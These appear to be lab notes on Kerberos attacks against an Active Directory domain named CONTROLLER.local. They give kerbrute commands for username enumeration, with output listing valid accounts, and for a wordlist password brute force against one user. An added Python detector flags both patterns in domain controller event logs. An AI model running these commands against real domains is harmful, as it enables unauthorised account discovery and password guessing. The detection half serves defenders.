kerbrute

Enumerate usernames


  user.txt is the username wordlist passed to userenum, taken from either of:
  • the local SecLists copy: /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt
  • a download: wget https://raw.githubusercontent.com/Cryilllic/Active-Directory-Wordlists/master/User.txt -O user.txt

/opt/windows/kerbrute userenum -d CONTROLLER.local --dc CONTROLLER.local user.txt
|->
2023/07/01 05:26:30 >  [+] VALID USERNAME:       administrator@CONTROLLER.local
2023/07/01 05:26:30 >  [+] VALID USERNAME:       admin1@CONTROLLER.local
2023/07/01 05:26:30 >  [+] VALID USERNAME:       admin2@CONTROLLER.local
2023/07/01 05:26:31 >  [+] VALID USERNAME:       machine2@CONTROLLER.local
2023/07/01 05:26:31 >  [+] VALID USERNAME:       httpservice@CONTROLLER.local
2023/07/01 05:26:31 >  [+] VALID USERNAME:       user3@CONTROLLER.local
2023/07/01 05:26:31 >  [+] VALID USERNAME:       user2@CONTROLLER.local
2023/07/01 05:26:31 >  [+] VALID USERNAME:       user1@CONTROLLER.local
2023/07/01 05:26:31 >  [+] VALID USERNAME:       machine1@CONTROLLER.local
2023/07/01 05:26:31 >  [+] VALID USERNAME:       sqlservice@CONTROLLER.local

Bruteforce a single user's password from a wordlist


/opt/windows/kerbrute bruteuser -v --dc CONTROLLER.local -d CONTROLLER.local /usr/share/wordlists/rockyou.txt admin1
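
On the domain controller, with Kerberos authentication failure auditing enabled, the userenum run above shows up as a burst of Security event 4768 failures with result code 0x6 (principal unknown) for the guessed names that do not exist, and the bruteuser run shows up as repeated event 4771 failures with code 0x18 (bad pre-authentication password) against one account. The following is an added example, not part of the original notes, that flags both patterns from one source address. The record field names, thresholds and sample events are assumptions constructed for illustration.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample records (not real logs). Field names are assumptions that
# mirror what a SIEM typically extracts from Security events 4768 and 4771.
def _ev(sec, event_id, status, ip, user):
    return {"time": datetime(2023, 7, 1, 5, 26, 30) + timedelta(seconds=sec),
            "event_id": event_id, "status": status, "ip": ip, "user": user}

SAMPLE = (
    [_ev(i // 20, 4768, "0x6", "10.0.0.50", f"guess{i}") for i in range(40)]      # unknown names
    + [_ev(5 + i // 10, 4771, "0x18", "10.0.0.50", "admin1") for i in range(30)]  # wrong passwords
    + [_ev(3, 4768, "0x6", "10.0.0.7", "jsmtih"),   # one typo from a workstation
       _ev(9, 4771, "0x18", "10.0.0.7", "user1")]   # one mistyped password
)

def detect(events, window=timedelta(seconds=60), enum_users=20, brute_failures=15):
    """Return alerts as (kind, source_ip, detail) tuples.

    enumeration: one source causes 4768/0x6 for at least `enum_users`
                 distinct names inside `window`.
    bruteforce:  one source causes 4771/0x18 at least `brute_failures`
                 times against one account inside `window`.
    """
    unknown = defaultdict(list)   # ip -> [(time, user)]
    badpw = defaultdict(list)     # (ip, user) -> [time]
    for e in sorted(events, key=lambda e: e["time"]):
        if e["event_id"] == 4768 and e["status"].lower() == "0x6":
            unknown[e["ip"]].append((e["time"], e["user"].lower()))
        elif e["event_id"] == 4771 and e["status"].lower() == "0x18":
            badpw[(e["ip"], e["user"].lower())].append(e["time"])

    alerts = []
    for ip, hits in unknown.items():
        # Largest number of distinct names inside any window starting at a hit.
        best = max(len({u for t, u in hits[i:] if t - hits[i][0] <= window})
                   for i in range(len(hits)))
        if best >= enum_users:
            alerts.append(("enumeration", ip, best))
    for (ip, user), times in badpw.items():
        best = max(sum(1 for t in times[i:] if t - times[i] <= window)
                   for i in range(len(times)))
        if best >= brute_failures:
            alerts.append(("bruteforce", ip, (user, best)))
    return alerts

if __name__ == "__main__":
    for alert in detect(SAMPLE):
        print(alert)
```

Valid usernames do not appear in the 0x6 stream, so the enumeration rule keys on the volume of invalid guesses; tune both thresholds against normal typo rates in the environment.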